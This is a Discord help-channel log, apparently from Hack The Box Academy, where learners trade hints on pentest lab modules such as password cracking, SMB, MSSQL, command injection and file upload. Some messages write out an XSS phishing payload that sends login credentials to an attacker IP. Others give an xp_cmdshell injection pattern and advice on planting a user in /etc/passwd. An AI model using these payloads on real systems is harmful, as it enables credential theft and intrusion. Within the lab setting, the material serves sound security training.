#modules
can someone give me a nudge on attacking common services - attacking smb? 'What is the password for the username "jason"?'
Me
Could someone help me on Attacking Common Services - Easy? Thx
did you find any cred?
found a user but brute forcing with the given pass list doesn't return anything and i've been trying rockyou but the machine runs out of time in the process @vital adder
what did you brute force and also use ||rockyou||
||SMTP|| so far and i'm using that
yeah you are in the right path and if you use ||rockyou|| the password should be in the ||top 100|| and also for the username you need to use the ||full mail address||
ohhh thank you man!
Can I dm someone about the **AD Enumeration & Attacks - Skills Assessment Part I**? (below error)
Hey, working on server side attacks but I can't connect to the server, any ideas? I can tell that everything is right
There must be a problem with your nginx conf file
i might be able to help
Are u sure? I Think that the problem is with the htb ip address
I get response with 127.0.0.1:80
Im having a problem with the Using Metasploit Module. I've set up my target machine with the proper exploit they want me to use but it just doesnt want to connect. Ive tried both the pwnbox and my VM via the ovpn to hackthebox and it just doesn't want to connect, can anyone help me?
EternalRomance. I tested a similar MS17_010 exploit with one of my other boxes in my VM lab and i was able to shell in just fine, idk why this is a problem on HackTheBox
sure dm me i'll help you troubleshoot
any hint for what word list to use on module Attacking Common Applications section Attacking GitLab i found the user but can't find the password
hi there - i started HTB from scratch - and it seems that in the "Starting Point" Tier I the S3 bucket is not running. Is this going to be fixed?
obviously my hosts file is setup, but i get a 502 proxy error when attempting to use a browser to access that bucket
check out #starting-point
anyone know about cve-2022-31625 or cve-2022-31626 ?
Hello,
I got redirected to this channel.
I'm pretty new around here. I am currently going through the "Getting Started" module.
I'm stuck on the "Knowledge Check" section.
It is about ||GetSimple CMS v3.3.15|| and ||CVE-2019-11231||
I saw some conflicting statement in the Discord history so I'm wondering if the box tied to that section is still functional ?
I have the following error when running msf : Exploit aborted due to failure: unknown: IP:80 - Upload failed
Maybe I just missed something
can someone assist on attacking common services easy lab?
||can upload files to webserver, but I can't get my reverse shell right||
can any one help with CROSS-SITE SCRIPTING (XSS) :Phishing: having issues removing the image url element on the page?
check the directory that you output your shell, it needs to be in the same directory as the web server
yes, it works, but I can only issue commands like 'dir' etc. can't get a reverse shell
shoot me a dm i'll help you with this
for this you don't need a rev shell just run normal command no enum and find the flag in the admin desktop
alright thank you
My mistake was I put / instead of \ in the path... this actually cost me like 45minutes oh boy
stuck on password attack hard lab, already found johanna creds and rdp to the machine.
found some .kdbx file, upload it on my attack machine and crack the pass to find the
masterkey...can't find anything else after that. any hint?
did you find ||david|| cred in keepass ?
yessir
if you do a nmap scan you will find some services on that box and one of those services will accept that user cred
Let me double check ...
I would love to know how you got the page to display correctly. I could never clean up the extra characters.
this isn't as much code as i remember so for the payload at the end use <!--'); instead of ;document.getElementById('urlform').remove(); so at the end of the payload it should be "Login"></form><!--');
also this doesn't affect anything but for fun you can still add an icon
Hi I'm stuck in the FOOTPRINTING module DNS... anyone can help me? What is the FQDN of the host where the last octet ends with “x.x.x.203”? I did dnsenum --dnsserver 10.129.132.192 --enum -r -p 0 -s 0 -o subdomains.txt -f ~/htbAcademy/jpt/wordlist.txt inlanefreight.htb and ran the same on every ns a soa i found but no luck. wordlist is the one from seclist.
did `dig axfr inlanefreight.htb @10.129.132.192` and everything found after that like axfr mail., axfr dc1. etc
I had document.write('<h3>Please login to continue</h3><form action=http://10.10.14.185><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>)';document.getElementByid('urlform').remove();<!--
can someone give me a nudge on a foothold for common services - medium lab? can't find any username/creds
Have you tried to mount the shared drive/folder?
oh i mean without the ;document.getElementById('urlform').remove(); just <!--'); so your payload need to be
document.write('<h3>Please login to continue</h3><form action=http://10.10.14.185><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form><!--');
I will go back and try to add '}; and see if that fixes it
do a ||full port scan|| and enum the highest ||port||
thx
tried the creds on all services found but am getting access denied, am i missing something?
did you try ||smb||
yes i did, getting access denied
so you use ||david|| cred in the ||smb|| and still get access denied and which share did you try to access
the one with the same name as user, actually all of them
yes that's the right share can you access that?
HTB makes me wanna cry. finally figured it out but took way too long for this.
still can't access, session setup failed: NT_STATUS_ACCESS_DENIED
Shoot me a DM with the command that you use
HTB challenges my perseverance
anyone for a nudge on common services - hard?|| impersonated the user but stuck now, getting an error when trying to communicate with the remote db||
use ||double single quotes|| if your command has two parts, so if you run ||EXECUTE('xp_cmdshell ''dir''')|| you need to use ||double single quotes|| but if your command only has one thing like ||EXECUTE('select @@version')|| then you don't need to use that
can I dm you? not sure if i'm missing smth
sure
can anyone help im trying to launch Parrot OS on a VM but its not in the options
did you download the parrot iso and create a new linux vm with that iso?
There is only an option for linux no parrot os, or iso. I have no idea how to download the parrot iso. I do have parrot OS installed and on a virtual disk somehow
just search about this on youtube, there are videos that show you how to setup step by step
I think I installed it wrong because there is nothing in the virtual disk that says parrot OS,
followed a step by step guide on youtube and it still didnt find the OS
finally finished both of the Skills Assessments still need help with this section
and also can i dm someone about this module cheat sheet? mine looks like it's missing some stuff
You need help with attacking common services?
nope Attacking Common Applications
oh i found the user but can't find the password
yeah i get that part but can't find a word list that has that password
is that password in rockyou?
So I was able to get Parrot OS onto it but now when I set it up and install it, instead of going to parrot OS when it restarts it goes to grub and disables the keyboard.
@tender marlin Is it your first time using parrot os
What help do you need?
ffs i was doing the same thing kekw
i spent a lot of time on that
So at the XSS module phishing part i keep getting the "Issue in sending URL!" like many others before, even with a payload posted earlier my own payload and the one posted earlier both work when i test them, however i can't send it to the "victim".. any ideas what could be the problem? Tried both url encoded and not url encoded and once again, works when i test it, probably would work if the "victim" would accept and use it but i guess the bot is finding smthn it doesn't like with it because it rejects it
hope this is not an issue with the exam later because that would be very frustrating
virtualbox?
hi everyone , i am currently stuck at the module Web Attack - Bypassing Security Filters , I have tried quite a lot of different HTTP Verbs like POST,PATH,UPDATE,PUT,DELETE ,OPTIONS and using url encode but only get the message "Malicious Request Denied!" Can someone please suggest me ?
Hello, I need some help on the Attacking Common Applications module - Skills 1; On the tomcat application I can't find the manager or host-manager, also tried the ghost at exploit but didn't get something useful…what am I missing, any hints?
Search for a CVE for this Tomcat version
Is it the Open redirect? I did search for CVEs there are 3 on exploit db but not sure which and how to use them. I tried but I might have made a mistake
DM
Has anyone had issue connecting to the VPN I can't get it to run and say initialization complete.
Hi there guys! Could someone please give me a nudge on Credential Hunting in Linux? I may be doing something wrong
in passwd attacks module?
if so DM me
dm me
can someone assist with remote/reverse port forwarding with ssh? pivoting module, my pivoted meterpreter session closes instantly
Hello, I am stuck on the Stack-Based Overflow Linux x86 Skill Assignment. I got a working shellcode in gdb but when I try it outside it's not working
nvm found my mistake
Reason: Mass mention
can someone please give me full list of thing we can do with the file
/etc/passwd
Mostly used for checking users on a linux system
suppose you've write permission to that file you can add your malicious user in there and leave the password field blank with an x and do some serious damage...
@worthy yoke alright I finally figured it out and got Parrot OS running on my VM, and Thanks jnvk for helping me out
Could I have help with Linux Buffer Overflows Skills Assessment?
@zealous fiber also needs help with this skills assessment
So I am having a bit of a struggle in the Password Attacks Module. I am using crackmapexec winrm on the target box, with the provided username.list and password.list, but when I hit enter it pauses for a second and then just returns me to the terminal prompt. No output or errors or anything.
not sure if it is the cause of your problem, but make sure you have the latest version of crackmapexec. Ran into a bunch of problems with it doing the same stuff and just needed to update it
Heard, I'll check
@dire sentinel Seems to be happening with both 5.2.2 and 5.3.0
what question are you on? feel free to DM
Found out what the Problem was. Pm me
Got it.. thanks
Anyone who has done the web attacks module, did you use the curl method? or the bash script? if so what regex did you use? I have done this module using burp but I want to understand the other method as well.
So now I'm having problems with hydra and smb in Password Attacks. I keep getting Invalid Reply from Target
DM me @vale salmon
did you get it?
can anyone point out what am I missing: I start the nessus service with " systemctl start nessusd.service" then I am giving option to choose from multiple identities, I chose the htb-student and type the password. I do get the Authentication Complete followed by "Failed to start nessusd.service: Unit nessusd.service not found." (even tried "nessus.service")?
you have to sign up for nessus
this is in the pwnbox, do I still need to signup?
yes, nessus is a service provided by Tenable. You have to sign up with them to use it on any system
that is odd, shouldnt the pwnbox be already registered cause i did get a username and password from the module
nope, doesnt quite work that way im afraid.
thanks, much appreciated
hello friends
hi there jared...
hi, anyone who has completed the SSRF skill assessment can share a hint with me..!!!
I'm complete stuck
can someone give me a nudge on the pivoting skills assessment? what's the best way ||to transfer the lsass dump to my host||?
or did you try transfer ||mimikatz|| on the target machine
omg I did not know I could do this but I just found about this..
if anyone wants an easy way to transfer files with xfreerdp just add /drive:SHARE,/home/kali as arguments when connecting. Maybe it was obvious but I didn't know this. This is lifechanging
thx, I will try that method as well
How those last 2 modules treating you?
i am taking it easy from modules
i am teaching a networking class next month so just going over the course work
and even though i troll compTIA hard i kind of want to get network+ for the lulz
Do you teach CCNP ?
I'm tired of the network at the company, sometimes it disappears for unknown reasons
good evening
hey bb
Hi everyone!
Who can help me with the "Windows Privilege Escalation - Vulnerable Services"?
I can't get a reverse shell on my netcat listener.
I saw a picture of @west canopy . I have the same one except the needed shell. The shell.ps1 seems to be edited correctly as well. The Scope in the Bypass state.
i am stuck at command injections module, Bypassing Other Blacklisted Characters, could someone give me some help on it please
i am not able to figure out the syntax needed
Did you try encoding?
should I use URL-encoding?
yes
so first ${LS_COLORS:10:1} for semicolon and then the encoded command or the whole thing encoded?
Follow the principle of an example in this section while constructing the command you need. Use Burp.
thanks for the help, I will continue
quick confirmation, is "127.0.01; ls /home" correct syntax for the task?
Not yet but you are moving closer
i mean that is in the raw format without any attempt to get it through the filters
just trying to make sure that I am not facing two issues simultaneously
File Upload - Skill Assessment: Could I ask someone a question?
I think I have almost everything (source code, naming convention, regex filtering, ...) but I can't seem to get the MIME type right and I don't see what I'm missing.
feel free to dm me if you still have question
do you mean that the syntax is quite there or the syntax is correct but missing bypassing techniques / encoding?
Shells and payloads live engagement last server can someone dm me I have a few questions
Could someone help me on Attacking Common Services - Hard lab?
feel free to dm me
Password Attacks -> Credential Hunting in Linux: Pretty stuck. Tried brute-forcing multiple services with provided username and credentials from hint. Any help would be appreciated!
Shells and payloads live engagement last server can someone dm me I have a few questions
Secure Coding 101: Skills Assessment -- Managed to get thru the other sections of this, and managed to get the first question in the skills assessment, but absolutely, positively, utterly LOST on the rest of the skills assessment... Is there a Secure Coding 99 or 100 that someone can refer me to by chance so I can complete this?
EDIT: Holy hell, I actually got the second, third, and now fourth questions in skills assessment solved as well... final one -- patching...
Having trouble with this too.
General question here:
When I run
gobuster dns -d http://whatever.url -w /usr/share/dnsenm/whatever-the-filename-is.txt
I seem to lose my VPN connection after a few minutes. Am I missing something here? Is HTB just shutting off that connection to protect against some kind of nefarious activity? I know that I could use ffuf or similar, it just seems weird that I don't have problems if I run a gobuster dir command, but do have problems if I run a gobuster dns command.
HI
someone knows how to escalate privileges in the Getting started | Knowledge Check? I tried a lot of things
Hey everyone, I had a question. I got done with the *Service Scanning* section on Getting Started and we ended up using bob's credentials. I was curious as to how we got bob's credentials?
.......
Like, I understand we used smbclient to see what types of shared folders were listed and that there was a non-workgroup labeled users. But after that the documentation just states to use bobs credentials..? I was just curious as to how they were able to actually view the creds and knew how to use them.
its always the anime profile pictures bro
always.

jesus christ what are you feeding your arms man
can someone explain to me what is flag
find flag - what is it and how we can find with curl
it will be a text file called "flag.txt" , you must find its location and read its contents
hence "capturing the flag"
for example its says , use this url and find the flag
how can i find with curl
been stuck 2 days
which module/section are you on?
GET section
1 sec homie i got you
love u mate
Anyone have success in the IMAP/POP Footprinting module. Stuck on the last question. I'm able to login to the IMAP server, Select the "INBOX" and now I'm stuck with fetching the messages within this inbox. Any insight would be greatly appreciated
Every fetch command I get an error. I know my syntax is off but still have no idea what command to issue to retrieve the flag
Dm me
that one is tough! need more than what is presented in the module. try googling imap/pop3 commands and try out different combinations of what you find
hey guys, i need help, any one?
Where you at?
i just wanna know what machines should i go through when im done with some modules ?
I guess it depends on the modules you've gone through
But even though you can try easy machines
And use maybe guidance from YouTube
At the end of certain modules, machines are listed which you could then solve.
i dont see any suggestion for machine after im done with the module thats why im asking
all i can see is "Suggested Modules"
Which modules have you solved so far?
wait... i think you're right, i've been doing modules i didnt notice that it suggest for machine its like not every module has machines to do
thank you i need to go back for all what i did
I'm having trouble with this HTB challenge
can someone help me without giving me the answer
@everyone
pm me
Could I solicit a nudge/DM from either yourself, @knotty hemlock , or anyone else who has completed the Secure Coding 101: Javascript -- Patching Skills assessment? I deciphered the code, and (I would argue successfully) have identified and patched 2 ||sanitization|| vulnerabilities in the script, but upon submitting, it always errors out. Depending on how I choose to modify it, either (a) that the function that needs to be run is not, (b) that parameter validation failed, or (c) error while running code ensure runs with node file.js [which it does just fine]. Going absolutely insane on this one...
^ yes if anyone wants to carry me through the second half of Secure Coding, i am accepting volunteers
DM me -- I can (sorta/kinda) carry you thru all but that final question where I'm at a total loss... I say sorta/kinda as I managed to fumble my way thru it
Awww thanks bud! I might take you up on that in the future if thats ok
No worries, sounds good. Will say that if you go back to re-read/re-review the appropriate section(s) with a fine-tooth comb, it starts to make sense (kinda). Enough at least that I again managed to solve everything (but that last question on skills assessment). NOT easy, had numerous windows open (thank goodness for dual large monitors).
I think i am on custom decoder right now
but i have the javascript all unpacked and i have a bunch of variables renamed to something more human readable
so i am thinking it should be smooth moving forward
And i skipped ahead and did the first question of the Skill Assessment because it was low hanging fruit
Hi, does anyone speak Spanish? I'm just getting started :')
How to have a role
Need to verify in one of the bot channels i think, using a key from your actual hack the box account
There are other vulnerabilities that need to be patched as well. If you get the validation error then you're on the right track and need to patch that vuln
damn LFI skills assessment
Hi. I'm stuck on "Attacking FTP". I've found a first user/password which give me access over FTP and SMB and then SSH. I have the name of the second user but was not able to bruteforce the password using the given list. Any hint ? Thanks,
what format is the password hashed in ?
I'm a tad stuck on Password Attacks/Finding the Credentials for MySQL. Not sure where to start with the credentials I currently have. Maybe a nudge the right way?
Hi all, have a question on the HTTP module. Question asks to use cURL to download a file from 'the server shown above'. Is that the server in the examples (inlanefreight.com) or a server in the terminal or something else? Thanks for the help.
Never mind - sorted it. Pays to read instructions.
Hello I'm pretty new here
Hi

Is there a standard way to let kerbrute just output all enumerated users into a file One per line? Like valid_users.txt?
Maybe I'm just blind
Could anyone possibly nudge me in the right direction on Password Attacks - Default Credentials? I am not entirely sure how to use the previous credentials to snag the MySQL credentials, especially since MySQL seems to not be running.
Did you try to connect "locally" to MySQL ?
hello, I'm really stuck with SSRF skill assessment, anyone who can give me a hint..!!!
I tried, but the credentials I'm logged into the box with don't work for it and neither do the three default options I found for MySQL
Did you use https://github.com/ihebski/DefaultCreds-cheat-sheet ?
Yeah, that's where I found the 3 defaults for MySQL
One of the three works for me 🤨
What section in password attacks?
Hmmm. Maybe my command is wrong then. I am using|| mysql -h localhost -u <username> -p<password> mydb||
The Default Credentials section where you have to find the MySQL credentials
Try mysql -u <username> -p
Agreed
Ah hah. I was using the command wrong. I really need to put STOP OVERTHINKING! in bold in my notes.
anyone who can share with me a SSRF skill assessment hint
Im still confused to what this even is
Hi, did you manage eventually to find the flag ? I've managed to find the r user after getting the ssh access with the j user. No luck bruteforcing the password with the given passwords lists.
Can anyone help with intro to assembly?
which section?
Off top of my head unsure, but I generally like to tee things like that, and then once done, grep the output for what I'm after.
"Attacking Common Services / Attacking FTP
yeah for some reason in my note i wrote something change and the flag is in the ||ftp|| and you just need to login as the user r and get the flag
i think before in the ftp there is a ssh key and you have to use that to login via ssh and get the flag and i just try the flag is in the r user ||ftp||
the ssh key is for the j user in the SMB section
and it's not working for the r user
i don't see anything about a ssh key in the smb section for that section after you got the cred you can just login via ssh and get the flag
shoot me a dm i'll help troubleshoot
I was trying to grep it but couldn't get the syntax right
In the AD Enumeration Module it says "Windows Defender (or Microsoft Defender after the Windows 10 May 2020 Update) has greatly improved over the years and, by default, will block tools such as PowerView. There are ways to bypass these protections. These ways will be covered in other modules."
Which module covers this? Or is that module not out yet?
not covered yet
OK
Hi! I'm new here and im a beginner. I'm stuck with the first lab in Sqlmap essentials, the Case4 (last question). Anyone know how to do it? if yes dm please
I love it when the modules foreshadow
In the future we should be getting an OSINT staff investigation module
Anyone knows a machine without a webserver? then pls tag me. Thanks
as far as "recent" machines i really enjoyed Timelapse
Okay, I'm struggling a bit on the Credential Hunting for Linux in Password Attacks. I can't login with the credentials for Kira via any service so far as I can tell, I can't seem to bruteforce credentials for will. Not sure what I'm not doing.
@vale salmon try using a mutated version of|| LoveYou1||
Ah good grief. I knew I was forgetting something.
thanks!
Lil stuck on Password Attacks Lab Easy. Able to ssh with a user, thats about it
A nudge would be appreciated
try to check some files, make sure|| to list all files ||
This module is kinda making me want to beat my head against the wall. How am I supposed to get access to /etc/shadow without root? (Password Attacks: Passwd, Shadow & Opasswd)
do what @copper creek said above
🤦
Is hashcat supposed to take like 40 minutes for one hash?
Don't recall for it to take that long in that module
Hmm. Did you use rockyou.txt as your wordlist?
Afair barely used rockyou, mostly the provided list or the mutated one
Specifically, I'm using hashcat on the unshadowed hashes. If I do the whole file, it tells me almost 4 hours
Just the hash I want is roughly an hour
I'm going through Windows fundamentals module again, and I noticed somewhat of an issue in 2nd part of it "Operating System Structure"... not sure if anyone else has ran into it, but the non-standard directory it asks for is non-existing, as there is one with different name than what is an accepted answer
the non-existing dir which exists there is ||75<REDACTED>02|| whilst the accepted answer is ||c8<REDACTED>75|| (not sure how much I'd be allowed to show here, so if it's too much I'll remove it)
Attacking Common Services | Attacking SMB --> I've used the password list from the resources. Nothing.
used jason.. Do I have to mutate the password list. Im going to attempt capital J
Resorted to using metasploit instead of crackmapexec. Not sure if that is intended or not, or even what the difference is
guys is signing in hackthebox website safe ?
cuz i have been scammed in the past a few times
for what its worth I signed in earlier today and i'm ok
ok
one more thing is it necessary to have 16 or 8 gb ram if we are using hackthebox website hacking lab?
ya u should be good
if you are running a vm that might be cutting it kind of close
but if you are using just the browser/pwnbox its probably ok
Is there a better way to crack the unshadowed hashes from the Password Attacks: Passwd, Shadow, & Opasswd section than using hashcat or john? john says it'll take over an hour and hashcat gets exhausted no matter what password list I use.
it takes forever
That's unfortunate
Is Python a good option for bug bounty hunting, exploit dev, wireless hacking, network hacking, SE pentesting, OSINT, etc?
Because I get conflicting reviews. I started this Python course and really like it
Would C/C++ be better? A lot of people say Python is best choice for cybersecurity but I hear some people say C/C++ is better
Can someone help me with the Active Directory skill assessment part II?
@quasi wave I'd say you should start with Python since the learning curve is easier and then it will be easier to learn C++ if you end up needing it.
Python is considered the standard for cybersecurity imo
Hi, I have problem with ATTACKING COMMON SERVICES -> Attacking SMB. I can get the credentials for jason, but I can not login to ssh, since I get jason@10.129.210.195: Permission denied (publickey).
Why use a saw (c/c++) to slice the bread when you can do it efficiently with a knife (python). Low-level stuff needs the knowledge of Assembly and C/C++.
@shadow orbit try to login smb
solved it.. thanks
Hi guys.
Need help on windows x86 buffer overflow - fuzzing parameter. I found the offset and tried everything and got also the length of A until it crashes
It asks for the smallest payload size. But when I enter the size of the smallest payload it doesn't count? What am I missing?
I would focus at one thing at a time
I am just starting out and i was wondering if you guys can give me some tips on where and how to start? i want to be a redhat hacker i have a problem knowing where to start
If you want to learn a programming language definitely start with python
can somebody tell me which userlist i should use and on which target on question 4 or the second skill assessment in Active Directory?
I love this quote from the user data in the Web Attack section "A fool with a tool is still a fool. Always have a goal, a plan & the tool as the enabler." :3
@barren oak what redhat?
can i get a nudge for logging into mssql in attacking common services? Not working any which way i try it with the credentials given.
oath is so broken 2fa is the reason accounts get hacked
I have a problem with the WEB REQUESTS module
under HyperText Transfer Protocol (HTTP)
in the first and only task I can not understand what I do wrong
I can download the right file, but what to do next I do not know
Please help me
Did anyone who did Password Attacks: Protected Archives have issues cracking the hash on the Zip Archive? I've tried zip2john, hashcat, and fcrackzip and had no luck.
For Starting Point: Responder, I'm not getting a response when I run Responder. I'm running Kali on a virtual machine and have a eth0 address but no tun0 address
@vocal parcel maybe check out #starting-point
@vale salmon i was able to crack it fine with john and ||mut_password.list||
try sqsh -S 10.129.89.37 -U htbdbuser -P 'MSSQLAccess01!' -h
If i told you that I've been doing that the whole time and for some reason I just NOW noticed i was missing the b in 'htbdbuser' you would probably be disappointed right?
but think of how much you learned
LOL
I was doing this last night, and went right back after it this morning, and decided to stop and watch football before I drive myself insane, and i just now noticed
i guess the lesson learned is don't forget some breaks haha
ya when i am tired i start overlooking simple stuff
Yeah, I finally realized I was using the wrong password list
Could someone clarify the wordlist to use for Passwd, shadow & Opasswd for Password attacks for the shadow root hash? I've tried the obvious small ones with no results and rockyou is taking a while.
@arctic acorn should be able to crack it with|| mut_password.list||
Having a bit of an issue on a hash word list combination attack
The module is combination attack
I see i am using the wrong word list
im trying to do the pivoting module, Double pivots section and it looks like the proxifier website is down, anyone have this problem and or solution?
Thanks for the quick reply, didn't think we still had to use that one.
Can anyone tell me what is wrong with the command i am typing. Its the mask attack section
@mystic fern if u send me a screenshot i can take a look
Anyone around here completed the File Upload assessment I can bounce some ideas off of?
This is where I am stuck? Did you get past it?
Seems like I'm not the only one getting stuck here. I have interrupted a valid POST request and modified it by inserting php code after the magic byte (I've done this for both PNG and JPG file types), I am bypassing all of the filters, including the MIME type actually. I can see the file on the remote server, but the php code is not being executed. I have tried many different php file extensions as well:
.pht, .phpt, .phtml, .php3, .php4, .php5, .php6, .php7, .phps, .phar
Nothing seems to work! And I absolutely know I am overlooking something very silly and stupid. Because that's just how I roll....
NVM, I tried harder......
That's 3 days of my life I'll never get back, and it was something stupid.
It's like when I finally break down and get outside my comfort zone and ask for help, the answer just appears.
Alright, so I'm working the Password Attacks Easy Lab. I'm trying to use hydra to get any credentials, but it takes forever and my target timer ends up expiring, even if I refresh the target.
What am I doing wrong?
I am using the username.list and password.list provided in Resources
try attacking|| ftp|| and crank up the tasks so it runs faster ๐
Past ||16|| tasks?
i think you can go up to 64 with no problems
np!
Also, is it just me or does the Time Left for the target speed up when using something like hydra?
Lol, I just got home. I started with a fresh target at 90 minutes and in the span of 5 minutes it has dropped to 65 minutes.
I know my sense of time is a bit screwy, but it isn't that bad
haha i remember being up all night on the medium lab
but it was great because i had so many ideas and my mind was racing
Oh yeah, I was up until 2am this morning getting through the rest of Password Attacks
your mind was racing or it became a monkey mind like mine?
its hard to say
because even a monkey can write shakespeare
given enough time and entropy in the universe
i managed to solve it though
I have ADHD so I hyperfocus anyway
the hard lab had me stuck for a few days
I doubt that. Shakespeare mind still has some kind of focus
in this info age, i believe we all have ADHD. paradox of choices and endless distractions
To some degree, yes, but I got a diagnosis as a child, so around 30 years ago.
This period of time just gives me plenty of things to hyperfocus on
You're lucky. In my society, mental illnesses are defined as possessions by some unhuman creatures. So we sort it out on our own.
Yeah, I feel very bad for everyone who grew up in a situation like that. I am exceptionally lucky, too, that ADHD is the only thing I have to cope with.
yup. Transcendence is rare emotion to experience these days
Thanks brb was taking nap n brakinh now have to go out thank you
In order to use id_rsa for login to SSH, its permissions have to be set to 700, yes?
i think 700 is for .ssh folder
Ah, excellent
Same but on the spectrum instead
Just because someone has issues focusing doesn't necessarily mean they have ADHD .
I have focus issues a bit but i dont think i am ADHD. I think i find it more of a task to focus on anything i am not passionate about.
That's the damn truth
The problem with hyperfocus is that you constantly run the risk of burnout. That is where my struggle is.
so you mean monkey mind is not ADHD? whats the difference
Indeed i agree
and tunnelvision
Could I pick someone's brain about the Password Attacks Medium Lab real quick?
Also for the password attacks module, are we given a certain wordlist???
yes it's in Resources
sure shoot me a dm if you still have question about that
oh and a tip for that section is try to answer the first question after you get access to the target system take all of the username from there and use that as the username wordlist for the other question
For the first question did you use winrm or crackmapexec?
i think i use crackmapexec for winrm
try installing with gem
Edit: Disregard
or pip3
derpp for some reason i was thinking evil-winrm
that's weird i try run the same command to test something out and it will not stop on success i don't know to make it do that
going to reset target. Maybe that will work
How long should I expect for crackmapexec to give me the password? The cracking on the hydra module was relatively quick
i would about 5-7 minutes maybe or maybe longer but i have no idea how to make it stop on success so watch out for that
with crackmapexec you can use --continue-on-success | grep '[+]', it will only show the valid creds found
but i need verbose and | grep "Pwn3d!" is better
Im back
Ugg this password attacks module is kicking my ass
I don't know if I am approaching things from the wrong angle, or if I am being too impatient with my hydra scans
Under the password mutations section, am I doing this right?
It sucks cause I 100% understand the theory
the password for that is over 17000 so...
what do you mean?
the password for that user is over 17000 word deep in the mutated wordlist
hi
if it is taking too long try to cut the first 17000 words
I can do a botnet stress test to people who are interested in security
On the getting set up module and it wont accept the right answer, It says "what does linux PAM stand for" I put in both Pluggable authentication Modules and Privilege access management and they both didnt work
There is a module that gives a recommendation for a program that can draw networks, does anyone remember what the mod or program is?
Do you mean draw.io?
One of those answers is correct, just make sure each word is capitalised.
Can someone help me with this question: Try to fuzz the program with '.wav' files of increments of 1000 bytes '1000, 2000, 3000...', and find the smallest payload size that crashes the program and overwrites EIP with '41414141'. On the Windows Stack Based Buffer Overflow module
I have the same problem. Did you get a solution yet?
Hi Guys, im stuck at Credential hunting for linux. i have tried bruteforcing several ways, still no lucks. HELP!
There's a tool mentioned for a specific browser in the module. Try using it. I had to transfer the folder to my host and then use the tool there.
Hello together
I am currently on the Windows Fundamental course. In the section NTFS vs. Share Permissions I am supposed to mount to the share - with the following command:
sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.201.57/"Company Data" /home/user/Desktop/
But then I get the message
mount: /home/user/Desktop/: mount point does not exist
Next, I adjusted the path in the command:
sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //10.129.201.57/"Company Data" C:\Users\htb-student\Desktop
But the same message still comes up.
I have to add that if I get an error message I should install cifs utils with sudo apt-get install cifs-utils, but I also get an error message saying Package cifs-utils is not available, but is referred to by another package.
Does anyone have an idea where I should start in order to get further?
TQ so much man, got it!
could anybody help me figure out the medium lab from the enumeration with nmap module in academy?
i've tried every possible flag with nmap but I just can't get the version of the dns service running on the machine
@pliant sage i had to use pwnbox to get the answer, i couldnt get it from my VM. feel free to DM if you need help
think about which protocol DNS is using and then try again
If you want, I can send you my walkthrough. It worked with my VM at the time.
(Login Form Attacks:) Have you been able to solve this by any chance? I have the same problem. Hydra finds the user:pass pair, but the login doesn't work. Am I missing something here?
Can anyone assist with the attacking FTP module? I've found user J and their password. I've also found user R but have been unable to bruteforce their password with provided/known wordlists. I can ssh with J but have been unable to find any clues for what R's password may be.
in which module are you?
Attacking Common Services?
Feel free to DM me
Yes, attacking common services
DM
Thanks man
Yo how long would it take for someone to start earning money via bug bounties
can you guys access https://www.tenable.com/plugins?
in the vulnerability assessment module I can't download the right tool
The PwnBox has no Internet connection as far as I know
I do it from my host
From here the page can be reached
idk I get a "no access" message when I try to access any subdomain
All the more reason not to register
What exactly are you trying to do?
When you enter the URL in your browser, the page is not loaded?
Which subdomain do you want to access and from where do you want to access it?
yes
I just want to open the site, preferably open the list of plugins, but I can't do either
even from under the console the site rejects requests
Is a firewall in your network blocking access? DNS resolves correctly?
Anyone able to help me out with the medium footprinting lab? I'm hitting a wall
@plain coral I tried it for both and it didnt work, EDIT: I think there was a spelling or caps error cause it just worked
can anyone provide assistance. footprinting hard lab. found snmp is open and tried creating wordlists from NIXHARD and all seclists wordlists but no luck.
No idea which sites are blocked in Russia.
Yes, the site blocks any connection from Russia, cool
Anyway, thanks for your help.
did you try snmp walk?
where did you get stuck?
tried snmp walk with some public communities, then went on the onesixtyone to bruteforce from seclists
I need help is anyone free to help me with the hybrid mode section of the cracking passwords with hashcat module
Dm me
Can anybody help me please?
Im trying to change a meterpreter shell to a cmd shell using the "shell" command in the meterpreter session
but everytime it says |D-chain|-<>-127.0.0.1:9050-<><>-127.0.0.1:42893-<--denied
Weird, i've never seen that
can i DM you?
sure but i dont know if i have a solution for you haha
hi every one i m new here and i want learn hacking , can you help me
Is privacy a myth? If system was meant to be secured, enigma wouldn't have broken.
It's best to start with the simple modules (Tier 0) here in the Academy. If you have any questions, ask for help here in the chat.
ok tnx
can you explain to me well that I have no idea about it please
There is hackthebox.com and academy.hackthebox.com, both require their own separate accounts.
That is the "Welcome to HTB Academy" Module, should help get you in the right direction.
is it free
A few modules can be taken for free.
When you register you get 50 cubes and can unlock certain modules with them. When you have completed the module and answered all the questions, you get back a certain number of cubes. With this you can then complete further modules.
Hi everyone ... Web proxies mod there is question saying try to look for other flag in other directory ... I have checked all that directory but only one flag I got
check the ||root of the linux filesystem, ls / ||
which directory is at the top of the linux file structure?
Tnx you jarednexgent.. you solve my problem
i can't login in
help. footprinting lab hard. i am logged in as tom. any advice on what should be my path or am i down the wrong path
@sturdy igloo check and see ||what service(s) might be running locally on the machine... something like a database maybe?||
Thanks. Will start to check.
curious... anyone in here passed OSCP after using HTB academy? With practicing in the pwk and HTB too of course.
||Test ||
Password Attacks Lab - Medium: Have user ||jason|| and am able to ||dump keys and contents of one .tdb database||. Stuck past that, nudge would be appreciated
I think you have the wrong user.
i saw that
Could anyone help me out with the hard footprinting lab? ||I found creds to login to imaps but now im stuck||
Dm
guys can i hack games?
If u have skill
oh
Yes
roblox?
can u teach me to hack?
Youtube
ur a pro hacker
k
++kick @unkempt flame
๊งไน|Sฬดอฬaฬตฬอpฬทออnฬตฬอaฬธฬฬpฬถออ|ไน๊งโข got the boot!
hello, please don't ask for anything illegal
if you try to ask again to hack anything you will be banned
changing your username won't change your identity
u told to change ma name


i love everything about this
ok
Ayo why is asking for help illegal and Hacking is not in this group?
yea
i need justice
asking for help hacking a game company is illegal
then what are u doin?
And Hacking is not?
you need the #rules and discord tos, and to not forget the service that you are going to use TOS
not justice
if you want to make game cheats I suggest going to UC, otherwise we only entertain technical questions
whats UC?
or try out our gamepwn challenges!
what
where?
yes hacking is complicated...
that's why we have this platform, to learn progressively
and get help and guidance when we're stuck
DNS fail in HTB Academy Boxes ?
